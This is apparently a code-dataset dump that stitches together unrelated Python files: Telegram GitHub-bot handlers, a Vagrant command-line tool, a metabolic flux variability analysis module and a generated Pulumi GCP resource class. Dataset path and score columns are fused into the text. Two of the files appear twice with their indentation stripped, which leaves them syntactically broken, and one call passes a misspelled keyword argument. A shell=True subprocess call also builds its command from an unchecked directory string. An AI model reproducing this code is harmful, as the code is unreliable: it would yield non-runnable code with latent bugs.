    private = update.effective_chat.type == Chat.PRIVATE
    steps = [
        f'First you must allow me access to the repositories in question. To do this, <a href="https://github.com/apps/telegram-githubbot-revised/installations/new">install</a> my <a href="https://github.com/apps/telegram-githubbot-revised">GitHub App</a> on your account or organisation, and make sure that it has access to the desired repositories.',
        f'Use the command /settings to open my settings interface and press the login button. This way I will know who you are.',
        f'Add me ({context.bot.name}) to the chat/group in which you would like to receive notifications.',
        f'In that chat use /settings to add the repositories you would like to receive notifications for.'
    ]
    if not private:
        steps.insert(1, f'Go to a private chat with me, by clicking here: {context.bot.name}.')
    # Prefix each step with a keycap-number emoji (1️⃣, 2️⃣, ...).
    text = '\n\n'.join(f'{i + 1}️⃣ {step}' for i, step in enumerate(steps))
    msg.reply_text(f'<b>Github notification guide.</b>\n\n{text}\n\n'
                   f'Note that GitHub Help has more in depth guides on how to install GitHub Apps <a href="https://help.github.com/articles/installing-an-app-in-your-personal-account/#installing-a-github-app-in-your-personal-account">in your personal account</a> or <a href="https://help.github.com/articles/installing-an-app-in-your-organization/#installing-a-github-app-in-your-organization">in your organisation</a> if you are having trouble with step 1.',
                   reply_markup=InlineKeyboardMarkup([
                       [InlineKeyboardButton('Add me to a group',
                                             url=f'https://telegram.me/{context.bot.username}?startgroup=start')]
                   ]),
                   parse_mode=ParseMode.HTML,
                   disable_web_page_preview=True,
                   disable_notification=True)
def privacy_handler(update: Update, context: CallbackContext):
    """Handle /privacy: reply with the privacy policy and MIT license notice."""
    msg = update.effective_message
    msg.reply_text(
        f'🔏 Privacy policy for {context.bot.name}\n\n'
        f'GithubBot Revised is an open source bot built by <a href="https://telegram.me/jsmnbom"><NAME></a>.\n\n'
        f'GithubBot revised stores GitHub login tokens - if you logout they will be deleted from the server.\n'
        f'To prevent overloading GitHub servers, data received from GitHub is also cached according to GitHub server headers.\n\n'
        f'THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT '
        f'LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. '
        f'IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, '
        f'WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE '
        f'OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\n'
        f'The MIT-licensed source code for GithubBot revised can be found at <a href="https://github.com/jsmnbom/githubbotrevised">GitHub</a>.',
        parse_mode=ParseMode.HTML,
        disable_web_page_preview=True,
        disable_notification=True
    )
def login_handler(update: Update, context):
    """Handle /login: jump straight to the login menu of the settings UI."""
    # reply_menu renders relative to a menu stack; seed it at 'settings'.
    context.menu_stack = ['settings']
    reply_menu(update, context, settings.login_menu)
def delete_job(context: CallbackContext):
    """Job-queue callback: delete the message passed as the job's context
    (reply_handler schedules this for its self-destructing login prompt)."""
    context.job.context.delete()
def reply_handler(update: Update, context: CallbackContext):
    """Forward a Telegram reply to GitHub as a comment.

    The message being replied to carries encoded routing data in its
    entities (decode_first_data_entity) identifying the issue/PR/review
    thread the comment belongs to.
    """
    msg = update.effective_message
    # Leading '!' is an escape hatch: chat about a thread without posting.
    if msg.text[0] == '!':
        return
    data = decode_first_data_entity(msg.reply_to_message.entities)
    if not data:
        # Replied-to message has no encoded routing data; nothing to post.
        return
    comment_type, *data = data
    access_token = context.user_data.get('access_token')
    if not access_token:
        # Not logged in: show a deep-link login prompt and schedule its
        # deletion after 30 seconds via delete_job.
        sent_msg = msg.reply_text(f'Cannot reply to {comment_type}, since you are not logged in. '
                                  f'Press button below to go to a private chat with me and login.\n\n'
                                  f'<i>This message will self destruct in 30 sec.</i>',
                                  reply_markup=InlineKeyboardMarkup([[
                                      InlineKeyboardButton('Login', url=deep_link(context.bot, 'login'))
                                  ]]),
                                  parse_mode=ParseMode.HTML,
                                  disable_notification=True)
        context.job_queue.run_once(delete_job, 30, sent_msg)
        return
    # Prefix @author so the original poster is pinged on GitHub.
    if comment_type in ('issue', 'pull request'):
        repo, number, author = data
        text = f'@{author} {msg.text_html}'
        github_api.add_issue_comment(repo, number, text, access_token=access_token)
    elif comment_type == 'pull request review comment':
        repo, number, comment_id, author = data
        text = f'@{author} {msg.text_html}'
        github_api.add_review_comment(repo, number, comment_id, text, access_token=access_token)
if __name__ == '__main__':
    # Wire up persistence, the webhook updater, all Telegram handlers and the
    # GitHub update handlers, then start the bot. (Removed stray dataset
    # columns fused onto the final line.)
    # Not strictly needed anymore since we no longer have custom persistent data
    # But since we likely will want it in the future, we keep our custom persistence
    persistence = Persistence(DATABASE_FILE)
    # Init our very custom webhook handler
    updater = WebhookUpdater(TELEGRAM_BOT_TOKEN,
                             updater_kwargs={'use_context': True,
                                             'persistence': persistence})
    dp = updater.dispatcher
    # See persistence note above
    CallbackContext.github_data = property(lambda self: persistence.github_data)
    # Save data every five (5) min
    dp.job_queue.run_repeating(lambda *_: persistence.flush(), 5 * 60)
    # Telegram updates
    dp.add_handler(CommandHandler('start', start_handler))
    dp.add_handler(CommandHandler('help', help_handler))
    dp.add_handler(CommandHandler('privacy', privacy_handler))
    dp.add_handler(CommandHandler('login', login_handler))
    settings.add_handlers(dp)
    # For commenting on issues/PR/reviews
    dp.add_handler(MessageHandler(Filters.reply & reply_data_link_filter, reply_handler))
    # Non-telegram updates
    github_handler = GithubHandler(dp)
    dp.add_handler(TypeHandler(GithubUpdate, github_handler.handle_update))
    dp.add_handler(TypeHandler(GithubAuthUpdate, github_handler.handle_auth_update))
    dp.add_error_handler(error_handler)
    updater.start()
import argparse
import os
import subprocess
import sys
from jinja2 import Environment, FileSystemLoader
def layzee_parser():
    """Build the command-line argument parser for layzee.

    Returns:
        argparse.ArgumentParser: parser exposing provider/VM/vagrant options.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("-p", "--provider",
                        default="libvirt",
                        help="vagrant provider to deploy on")
    # FIX: default was the string "4096"; it only worked because argparse
    # re-parses string defaults through type=int. Use a real int for
    # consistency with --cpu.
    parser.add_argument("-m", "--memory",
                        default=4096,
                        type=int,
                        help="memory to allocate to the virtual machine")
    parser.add_argument("-c", "--cpu",
                        default=2,
                        type=int,
                        help="CPUs to allocate to the virtual machine")
    parser.add_argument("-b", "--box",
                        default="fedora/24-cloud-base",
                        help="vagrant box to use")
    parser.add_argument("-v", "--volumes",
                        action="append",
                        help="host path:guest path")
    parser.add_argument("-t", "--type",
                        default="nfs",
                        help="which mount type to use")
    parser.add_argument("-s", "--shell",
                        help="path to the shell script to provision the VM")
    parser.add_argument("-d", "--directory",
                        help="directory to place your Vagrantfile in")
    parser.add_argument("--stdout",
                        action="store_true",
                        help="print Vagrantfile on screen")
    return parser
def render_from_jinja(args):
    """Render the Vagrantfile.j2 template located beside this script, using
    the parsed command-line arguments as template variables."""
    template_dir = os.path.normpath(os.path.dirname(__file__))
    environment = Environment(loader=FileSystemLoader(template_dir))
    return environment.get_template("Vagrantfile.j2").render(**vars(args))
def vagrant_bootstrap(args, rendered):
    """Write the rendered Vagrantfile into args.directory (created if
    missing). Returns True on success."""
    target_dir = args.directory
    if not os.path.exists(target_dir):
        os.makedirs(target_dir)
    vagrantfile_path = os.path.join(target_dir, "Vagrantfile")
    with open(vagrantfile_path, "w") as handle:
        handle.write(rendered)
    return True
def vagrant_up(directory):
    """Run `vagrant up` against the Vagrantfile in *directory*, streaming its
    stdout line by line (Python 2 print statement).

    NOTE(review): *directory* is interpolated into a shell command string;
    a value containing spaces or shell metacharacters would break or be
    unsafe — consider passing VAGRANT_CWD via the env= argument instead
    (confirm callers before changing).
    """
    output = subprocess.Popen("VAGRANT_CWD={} vagrant up".format(directory),
                              stdout=subprocess.PIPE, shell=True, bufsize=1)
    # iter(readline, "") yields lines until EOF of the child's stdout.
    for line in iter(output.stdout.readline, ""):
        print line,
def main():
parsed = layzee_parser()
args = parsed.parse_args()
if len(sys.argv) < 2:
parsed.print_help()
sys.exit(0)
rendered = render_from_jinja(args)
if args.stdout:
print rendered
sys.exit(0)
if vagrant_bootstrap(args, rendered):
vagrant_up(args.directory) | cli.py | import argparse
import os
import subprocess
import sys
from jinja2 import Environment, FileSystemLoader
def layzee_parser():
    """Build the command-line argument parser for layzee.

    Returns:
        argparse.ArgumentParser: parser exposing provider/VM/vagrant options.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("-p", "--provider",
                        default="libvirt",
                        help="vagrant provider to deploy on")
    # FIX: default was the string "4096"; it only worked because argparse
    # re-parses string defaults through type=int. Use a real int for
    # consistency with --cpu.
    parser.add_argument("-m", "--memory",
                        default=4096,
                        type=int,
                        help="memory to allocate to the virtual machine")
    parser.add_argument("-c", "--cpu",
                        default=2,
                        type=int,
                        help="CPUs to allocate to the virtual machine")
    parser.add_argument("-b", "--box",
                        default="fedora/24-cloud-base",
                        help="vagrant box to use")
    parser.add_argument("-v", "--volumes",
                        action="append",
                        help="host path:guest path")
    parser.add_argument("-t", "--type",
                        default="nfs",
                        help="which mount type to use")
    parser.add_argument("-s", "--shell",
                        help="path to the shell script to provision the VM")
    parser.add_argument("-d", "--directory",
                        help="directory to place your Vagrantfile in")
    parser.add_argument("--stdout",
                        action="store_true",
                        help="print Vagrantfile on screen")
    return parser
def render_from_jinja(args):
    """Render the Vagrantfile.j2 template located beside this script, using
    the parsed command-line arguments as template variables."""
    template_dir = os.path.normpath(os.path.dirname(__file__))
    environment = Environment(loader=FileSystemLoader(template_dir))
    return environment.get_template("Vagrantfile.j2").render(**vars(args))
def vagrant_bootstrap(args, rendered):
    """Write the rendered Vagrantfile into args.directory (created if
    missing). Returns True on success."""
    target_dir = args.directory
    if not os.path.exists(target_dir):
        os.makedirs(target_dir)
    vagrantfile_path = os.path.join(target_dir, "Vagrantfile")
    with open(vagrantfile_path, "w") as handle:
        handle.write(rendered)
    return True
def vagrant_up(directory):
    """Run `vagrant up` against the Vagrantfile in *directory*, streaming its
    stdout line by line (Python 2 print statement).

    NOTE(review): *directory* is interpolated into a shell command string;
    a value containing spaces or shell metacharacters would break or be
    unsafe — consider passing VAGRANT_CWD via the env= argument instead
    (confirm callers before changing).
    """
    output = subprocess.Popen("VAGRANT_CWD={} vagrant up".format(directory),
                              stdout=subprocess.PIPE, shell=True, bufsize=1)
    # iter(readline, "") yields lines until EOF of the child's stdout.
    for line in iter(output.stdout.readline, ""):
        print line,
def main():
parsed = layzee_parser()
args = parsed.parse_args()
if len(sys.argv) < 2:
parsed.print_help()
sys.exit(0)
rendered = render_from_jinja(args)
if args.stdout:
print rendered
sys.exit(0)
if vagrant_bootstrap(args, rendered):
vagrant_up(args.directory) | 0.290477 | 0.083106 |
from __future__ import division
import sys, time
sys.path.append('../../')
from tools.globalVariables import *
from fbaTools import fbaTools
from fba import fba
from tools.userError import userError
from tools.core.model import model
from tools.core.compound import compound
from tools.core.reaction import reaction
from pyomo import environ # It was previously: "from coopr import pyomo" for versions of pyomo older than 4.X
# The following lines change the temporary directory for pyomo
from pyutilib.services import TempfileManager
TempfileManager.tempdir = pyomo_tmp_dir
def fva(model, selected_rxns = [], optimization_solver = default_optim_solver, save_to_model = False, results_filename = '', simulation_conditions = '', warmstart = False, warnings = True, stdout_msgs = True):
"""
Performs flux variability analysis
INPUTS:
-------
model:
An instance of class model containing the information
about the metabolic model
selected_rxns:
A list (or tuple) of selected reactions for which FVA should be performed. If no
input is provided FVA is performed for all reactios in the model
optimization_solver:
Name of the LP solver to be used to solve the LP. Current
allowable choices are cplex and gurobi
save_to_model:
If True, it stores the identified bounds on reaciton fluxes in fva_flux_bounds. Otherwise
they are stored in a dictionary whose keys are ids and values are a list of two elements
in the form [fva_LB,fva_UB], whith fva_LB and fva_UB being the FVA LB and UB on fluxes
results_filename:
A string containing the name of the file to save the results in. If an empty string
is provided the results are not saved to a file
simulation_conditions:
A string describing simulation conditions
OUTPUTS:
--------
fva_flux_bounds:
A dictionary with keys being reactions ids and values beiing a list ot two elements
containing the fva flux bounds in the form [LB, UB]
<NAME> - Segre Lab @ Boston University
Last updated: 08-22-2017
"""
# save_to_model
if not isinstance(save_to_model,bool):
raise TypeError('save_to_model must be either True or False')
# selected_rxns
if not isinstance(selected_rxns,list) and not isinstance(selected_rxns, tuple):
raise userError('selected_rxns must be a list or tuple of reaction objects')
# optimization_solver
if not isinstance(optimization_solver,str):
raise TypeError('optimization_solver must be a string')
elif optimization_solver.lower() not in ['gurobi','cplex','gurobi_ampl','cplexamp']:
raise ValueError('Invalid value for optimization_solver. Allowed choices are gurobi and cplex')
# simulation_conditions
if not isinstance(simulation_conditions,str):
raise TypeError('simulation_conditions must be a string')
# warmstart
if not isinstance(warmstart,bool):
raise TypeError('use_warmsart must be either True or False')
# warnings and stdout_msgs
if not isinstance(warnings,bool):
raise TypeError('warnings must be either True or False')
if not isinstance(stdout_msgs,bool):
raise TypeError('stdout_msgs must be either True or False')
# If warmstart is True use gurobi_ampl
if warmstart and optimization_solver in ['gurobi', 'gurobi_ampl']:
optimization_solver = 'gurobi_ampl'
elif warmstart and optimization_solver not in ['gurobi', 'gurobi_ampl']:
# If the solver is not gurobi or gurobi_ampl warmstart should be turned off
# because other solvers such as gurobi will return an error (see fbaTools.py)
warmstart = False
print '**WARNING (fva.py)! warmstart was turned off becasue it can be used only with gurobi or gurobi_ampl as the solver. The specified solver ({}) does not support warmstart'.format(optimization_solver)
# A dictionary holding the FVA flux bounds
fva_flux_bounds = dict([(r.id,[None,None]) for r in model.reactions])
#--- Minimize rxn fluxes ---
for rxn in model.reactions:
rxn.objective_coefficient = 0
# Reactions to consider
if len(selected_rxns) == 0:
rxns_to_consider = model.reactions
else:
rxns_to_consider = selected_rxns
counter = 0
for rxn in rxns_to_consider:
counter += 1
rxn.objective_coefficient = 1
if counter == 1:
fba_model = fba(model = model, optimization_solver = optimization_solver, build_new_optModel = True, maximize = False, save_to_model = False, simulation_conditions = simulation_conditions, warmstart = warmstart, warmings = warnings, stdout_msgs = False, show_solver_output = False)
# From counter 2 on, turn off build_new_optModel and preprocessing and turn on warmstart
elif counter == 2:
fba_model.build_new_optModel = False
# Redefine the objective function if counter > 1
if counter > 1:
fba_model.optModel.del_component('objectiveFunc')
fba_model.optModel.objectiveFunc = environ.Objective(rule = fba_model.objectiveFunc_rule, sense = environ.minimize)
# Supply the current solution as the warm start
for j in fba_model.optModel.J:
fba_model.optModel.v[j] = fba_model.solution['opt_rxnFluxes'][j]
fba_model.run()
if fba_model.solution['exit_flag'] == 'globallyOptimal':
LB = fba_model.solution['objective_value']
else:
raise userError('fba problem to find LB for rxn {} in fva did not end with an optimal solution: exit_flag = {}'.format(rxn.id, fba_model.solution['exit_flag']))
# Store the results
if save_to_model:
rxn.fva_flux_bounds[0] = LB
else:
fva_flux_bounds[rxn.id][0] = LB
rxn.objective_coefficient = 0
#--- Maximize rxn flux ---
for rxn in model.reactions:
rxn.objective_coefficient = 0
counter = 0
for rxn in rxns_to_consider:
counter += 1
rxn.objective_coefficient = 1
if counter == 1:
fba_model = fba(model = model, optimization_solver = optimization_solver, build_new_optModel = True, maximize = True, save_to_model = False, simulation_conditions = simulation_conditions, warmstart = warmstart, warnings = warnings, stdout_msgs = False, show_solver_output = False)
# From counter 2 on, turn off build_new_optModel and preprocessing and turn on warmstart
elif counter == 2:
fba_model.build_new_optModel = False
# Redefine the objective function if counter > 1
if counter > 1:
fba_model.optModel.del_component('objectiveFunc')
fba_model.optModel.objectiveFunc = environ.Objective(rule = fba_model.objectiveFunc_rule, sense = environ.maximize)
# Supply the current solution as the warm start
for j in fba_model.optModel.J:
fba_model.optModel.v[j] = fba_model.solution['opt_rxnFluxes'][j]
fba_model.run()
if fba_model.solution['exit_flag'] == 'globallyOptimal':
UB = fba_model.solution['objective_value']
else:
raise userError('fba problem to find UB for rxn {} in fva ended with a non-optimal solution: exit_flag = {}'.format(rxn.id, fba_model.solution['exit_flag']))
# Store the results
if save_to_model:
rxn.fva_flux_bounds[1] = UB
else:
fva_flux_bounds[rxn.id][1] = UB
rxn.objective_coefficient = 0
# Save results into a file
if results_filename != '':
with open(results_filename,'w') as f:
f.write('fva_flux_bounds = {\n')
for rxn in fva_flux_bounds.keys():
f.write("'{}':{},\n".format(rxn, fva_flux_bounds[rxn]))
f.write('}')
# Return fva_flux_bounds if save_to_model is not True
return fva_flux_bounds | Ali_codes/fba/fva.py | from __future__ import division
import sys, time
sys.path.append('../../')
from tools.globalVariables import *
from fbaTools import fbaTools
from fba import fba
from tools.userError import userError
from tools.core.model import model
from tools.core.compound import compound
from tools.core.reaction import reaction
from pyomo import environ # It was previously: "from coopr import pyomo" for versions of pyomo older than 4.X
# The following lines change the temporary directory for pyomo
from pyutilib.services import TempfileManager
TempfileManager.tempdir = pyomo_tmp_dir
def fva(model, selected_rxns = [], optimization_solver = default_optim_solver, save_to_model = False, results_filename = '', simulation_conditions = '', warmstart = False, warnings = True, stdout_msgs = True):
"""
Performs flux variability analysis
INPUTS:
-------
model:
An instance of class model containing the information
about the metabolic model
selected_rxns:
A list (or tuple) of selected reactions for which FVA should be performed. If no
input is provided FVA is performed for all reactios in the model
optimization_solver:
Name of the LP solver to be used to solve the LP. Current
allowable choices are cplex and gurobi
save_to_model:
If True, it stores the identified bounds on reaciton fluxes in fva_flux_bounds. Otherwise
they are stored in a dictionary whose keys are ids and values are a list of two elements
in the form [fva_LB,fva_UB], whith fva_LB and fva_UB being the FVA LB and UB on fluxes
results_filename:
A string containing the name of the file to save the results in. If an empty string
is provided the results are not saved to a file
simulation_conditions:
A string describing simulation conditions
OUTPUTS:
--------
fva_flux_bounds:
A dictionary with keys being reactions ids and values beiing a list ot two elements
containing the fva flux bounds in the form [LB, UB]
<NAME> - Segre Lab @ Boston University
Last updated: 08-22-2017
"""
# save_to_model
if not isinstance(save_to_model,bool):
raise TypeError('save_to_model must be either True or False')
# selected_rxns
if not isinstance(selected_rxns,list) and not isinstance(selected_rxns, tuple):
raise userError('selected_rxns must be a list or tuple of reaction objects')
# optimization_solver
if not isinstance(optimization_solver,str):
raise TypeError('optimization_solver must be a string')
elif optimization_solver.lower() not in ['gurobi','cplex','gurobi_ampl','cplexamp']:
raise ValueError('Invalid value for optimization_solver. Allowed choices are gurobi and cplex')
# simulation_conditions
if not isinstance(simulation_conditions,str):
raise TypeError('simulation_conditions must be a string')
# warmstart
if not isinstance(warmstart,bool):
raise TypeError('use_warmsart must be either True or False')
# warnings and stdout_msgs
if not isinstance(warnings,bool):
raise TypeError('warnings must be either True or False')
if not isinstance(stdout_msgs,bool):
raise TypeError('stdout_msgs must be either True or False')
# If warmstart is True use gurobi_ampl
if warmstart and optimization_solver in ['gurobi', 'gurobi_ampl']:
optimization_solver = 'gurobi_ampl'
elif warmstart and optimization_solver not in ['gurobi', 'gurobi_ampl']:
# If the solver is not gurobi or gurobi_ampl warmstart should be turned off
# because other solvers such as gurobi will return an error (see fbaTools.py)
warmstart = False
print '**WARNING (fva.py)! warmstart was turned off becasue it can be used only with gurobi or gurobi_ampl as the solver. The specified solver ({}) does not support warmstart'.format(optimization_solver)
# A dictionary holding the FVA flux bounds
fva_flux_bounds = dict([(r.id,[None,None]) for r in model.reactions])
#--- Minimize rxn fluxes ---
for rxn in model.reactions:
rxn.objective_coefficient = 0
# Reactions to consider
if len(selected_rxns) == 0:
rxns_to_consider = model.reactions
else:
rxns_to_consider = selected_rxns
counter = 0
for rxn in rxns_to_consider:
counter += 1
rxn.objective_coefficient = 1
if counter == 1:
fba_model = fba(model = model, optimization_solver = optimization_solver, build_new_optModel = True, maximize = False, save_to_model = False, simulation_conditions = simulation_conditions, warmstart = warmstart, warmings = warnings, stdout_msgs = False, show_solver_output = False)
# From counter 2 on, turn off build_new_optModel and preprocessing and turn on warmstart
elif counter == 2:
fba_model.build_new_optModel = False
# Redefine the objective function if counter > 1
if counter > 1:
fba_model.optModel.del_component('objectiveFunc')
fba_model.optModel.objectiveFunc = environ.Objective(rule = fba_model.objectiveFunc_rule, sense = environ.minimize)
# Supply the current solution as the warm start
for j in fba_model.optModel.J:
fba_model.optModel.v[j] = fba_model.solution['opt_rxnFluxes'][j]
fba_model.run()
if fba_model.solution['exit_flag'] == 'globallyOptimal':
LB = fba_model.solution['objective_value']
else:
raise userError('fba problem to find LB for rxn {} in fva did not end with an optimal solution: exit_flag = {}'.format(rxn.id, fba_model.solution['exit_flag']))
# Store the results
if save_to_model:
rxn.fva_flux_bounds[0] = LB
else:
fva_flux_bounds[rxn.id][0] = LB
rxn.objective_coefficient = 0
#--- Maximize rxn flux ---
for rxn in model.reactions:
rxn.objective_coefficient = 0
counter = 0
for rxn in rxns_to_consider:
counter += 1
rxn.objective_coefficient = 1
if counter == 1:
fba_model = fba(model = model, optimization_solver = optimization_solver, build_new_optModel = True, maximize = True, save_to_model = False, simulation_conditions = simulation_conditions, warmstart = warmstart, warnings = warnings, stdout_msgs = False, show_solver_output = False)
# From counter 2 on, turn off build_new_optModel and preprocessing and turn on warmstart
elif counter == 2:
fba_model.build_new_optModel = False
# Redefine the objective function if counter > 1
if counter > 1:
fba_model.optModel.del_component('objectiveFunc')
fba_model.optModel.objectiveFunc = environ.Objective(rule = fba_model.objectiveFunc_rule, sense = environ.maximize)
# Supply the current solution as the warm start
for j in fba_model.optModel.J:
fba_model.optModel.v[j] = fba_model.solution['opt_rxnFluxes'][j]
fba_model.run()
if fba_model.solution['exit_flag'] == 'globallyOptimal':
UB = fba_model.solution['objective_value']
else:
raise userError('fba problem to find UB for rxn {} in fva ended with a non-optimal solution: exit_flag = {}'.format(rxn.id, fba_model.solution['exit_flag']))
# Store the results
if save_to_model:
rxn.fva_flux_bounds[1] = UB
else:
fva_flux_bounds[rxn.id][1] = UB
rxn.objective_coefficient = 0
# Save results into a file
if results_filename != '':
with open(results_filename,'w') as f:
f.write('fva_flux_bounds = {\n')
for rxn in fva_flux_bounds.keys():
f.write("'{}':{},\n".format(rxn, fva_flux_bounds[rxn]))
f.write('}')
# Return fva_flux_bounds if save_to_model is not True
return fva_flux_bounds | 0.462473 | 0.304571 |
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['GlobalNetworkEndpointArgs', 'GlobalNetworkEndpoint']
# Auto-generated input-args class; @pulumi.input_type introspects the
# __init__ signature and the @pulumi.getter-decorated properties below,
# so the structure of this class must not be altered.
@pulumi.input_type
class GlobalNetworkEndpointArgs:
    def __init__(__self__, *,
                 global_network_endpoint_group: pulumi.Input[str],
                 port: pulumi.Input[int],
                 fqdn: Optional[pulumi.Input[str]] = None,
                 ip_address: Optional[pulumi.Input[str]] = None,
                 project: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a GlobalNetworkEndpoint resource.
        :param pulumi.Input[str] global_network_endpoint_group: The global network endpoint group this endpoint is part of.
        :param pulumi.Input[int] port: Port number of the external endpoint.
        :param pulumi.Input[str] fqdn: Fully qualified domain name of network endpoint.
               This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
        :param pulumi.Input[str] ip_address: IPv4 address external endpoint.
        :param pulumi.Input[str] project: The ID of the project in which the resource belongs.
               If it is not provided, the provider project is used.
        """
        # Required arguments are always set; optional ones only when provided,
        # so that absent values remain unset rather than explicitly None.
        pulumi.set(__self__, "global_network_endpoint_group", global_network_endpoint_group)
        pulumi.set(__self__, "port", port)
        if fqdn is not None:
            pulumi.set(__self__, "fqdn", fqdn)
        if ip_address is not None:
            pulumi.set(__self__, "ip_address", ip_address)
        if project is not None:
            pulumi.set(__self__, "project", project)
    @property
    @pulumi.getter(name="globalNetworkEndpointGroup")
    def global_network_endpoint_group(self) -> pulumi.Input[str]:
        """
        The global network endpoint group this endpoint is part of.
        """
        return pulumi.get(self, "global_network_endpoint_group")
    @global_network_endpoint_group.setter
    def global_network_endpoint_group(self, value: pulumi.Input[str]):
        pulumi.set(self, "global_network_endpoint_group", value)
    @property
    @pulumi.getter
    def port(self) -> pulumi.Input[int]:
        """
        Port number of the external endpoint.
        """
        return pulumi.get(self, "port")
    @port.setter
    def port(self, value: pulumi.Input[int]):
        pulumi.set(self, "port", value)
    @property
    @pulumi.getter
    def fqdn(self) -> Optional[pulumi.Input[str]]:
        """
        Fully qualified domain name of network endpoint.
        This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
        """
        return pulumi.get(self, "fqdn")
    @fqdn.setter
    def fqdn(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "fqdn", value)
    @property
    @pulumi.getter(name="ipAddress")
    def ip_address(self) -> Optional[pulumi.Input[str]]:
        """
        IPv4 address external endpoint.
        """
        return pulumi.get(self, "ip_address")
    @ip_address.setter
    def ip_address(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "ip_address", value)
    @property
    @pulumi.getter
    def project(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the project in which the resource belongs.
        If it is not provided, the provider project is used.
        """
        return pulumi.get(self, "project")
    @project.setter
    def project(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "project", value)
# Auto-generated state class used by GlobalNetworkEndpoint.get(); every field
# is optional because lookups may filter on any subset of properties.
@pulumi.input_type
class _GlobalNetworkEndpointState:
    def __init__(__self__, *,
                 fqdn: Optional[pulumi.Input[str]] = None,
                 global_network_endpoint_group: Optional[pulumi.Input[str]] = None,
                 ip_address: Optional[pulumi.Input[str]] = None,
                 port: Optional[pulumi.Input[int]] = None,
                 project: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering GlobalNetworkEndpoint resources.
        :param pulumi.Input[str] fqdn: Fully qualified domain name of network endpoint.
               This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
        :param pulumi.Input[str] global_network_endpoint_group: The global network endpoint group this endpoint is part of.
        :param pulumi.Input[str] ip_address: IPv4 address external endpoint.
        :param pulumi.Input[int] port: Port number of the external endpoint.
        :param pulumi.Input[str] project: The ID of the project in which the resource belongs.
               If it is not provided, the provider project is used.
        """
        # Only set properties that were actually provided so unset values stay absent.
        if fqdn is not None:
            pulumi.set(__self__, "fqdn", fqdn)
        if global_network_endpoint_group is not None:
            pulumi.set(__self__, "global_network_endpoint_group", global_network_endpoint_group)
        if ip_address is not None:
            pulumi.set(__self__, "ip_address", ip_address)
        if port is not None:
            pulumi.set(__self__, "port", port)
        if project is not None:
            pulumi.set(__self__, "project", project)
    @property
    @pulumi.getter
    def fqdn(self) -> Optional[pulumi.Input[str]]:
        """
        Fully qualified domain name of network endpoint.
        This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
        """
        return pulumi.get(self, "fqdn")
    @fqdn.setter
    def fqdn(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "fqdn", value)
    @property
    @pulumi.getter(name="globalNetworkEndpointGroup")
    def global_network_endpoint_group(self) -> Optional[pulumi.Input[str]]:
        """
        The global network endpoint group this endpoint is part of.
        """
        return pulumi.get(self, "global_network_endpoint_group")
    @global_network_endpoint_group.setter
    def global_network_endpoint_group(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "global_network_endpoint_group", value)
    @property
    @pulumi.getter(name="ipAddress")
    def ip_address(self) -> Optional[pulumi.Input[str]]:
        """
        IPv4 address external endpoint.
        """
        return pulumi.get(self, "ip_address")
    @ip_address.setter
    def ip_address(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "ip_address", value)
    @property
    @pulumi.getter
    def port(self) -> Optional[pulumi.Input[int]]:
        """
        Port number of the external endpoint.
        """
        return pulumi.get(self, "port")
    @port.setter
    def port(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "port", value)
    @property
    @pulumi.getter
    def project(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the project in which the resource belongs.
        If it is not provided, the provider project is used.
        """
        return pulumi.get(self, "project")
    @project.setter
    def project(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "project", value)
class GlobalNetworkEndpoint(pulumi.CustomResource):
    # Auto-generated Pulumi resource class. The only code fix in this revision
    # is removing the dataset-dump artifact (" | sdk/python/... |") that was
    # fused onto the final `return` statement and broke the file's syntax.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 fqdn: Optional[pulumi.Input[str]] = None,
                 global_network_endpoint_group: Optional[pulumi.Input[str]] = None,
                 ip_address: Optional[pulumi.Input[str]] = None,
                 port: Optional[pulumi.Input[int]] = None,
                 project: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        A Global Network endpoint represents a IP address and port combination that exists outside of GCP.
        **NOTE**: Global network endpoints cannot be created outside of a
        global network endpoint group.
        To get more information about GlobalNetworkEndpoint, see:
        * [API documentation](https://cloud.google.com/compute/docs/reference/rest/beta/networkEndpointGroups)
        * How-to Guides
            * [Official Documentation](https://cloud.google.com/load-balancing/docs/negs/)
        ## Example Usage
        ### Global Network Endpoint
        ```python
        import pulumi
        import pulumi_gcp as gcp
        neg = gcp.compute.GlobalNetworkEndpointGroup("neg",
            default_port=90,
            network_endpoint_type="INTERNET_FQDN_PORT")
        default_endpoint = gcp.compute.GlobalNetworkEndpoint("default-endpoint",
            global_network_endpoint_group=neg.name,
            fqdn="www.example.com",
            port=90)
        ```
        ## Import
        GlobalNetworkEndpoint can be imported using any of these accepted formats
        ```sh
        $ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default projects/{{project}}/global/networkEndpointGroups/{{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
        ```
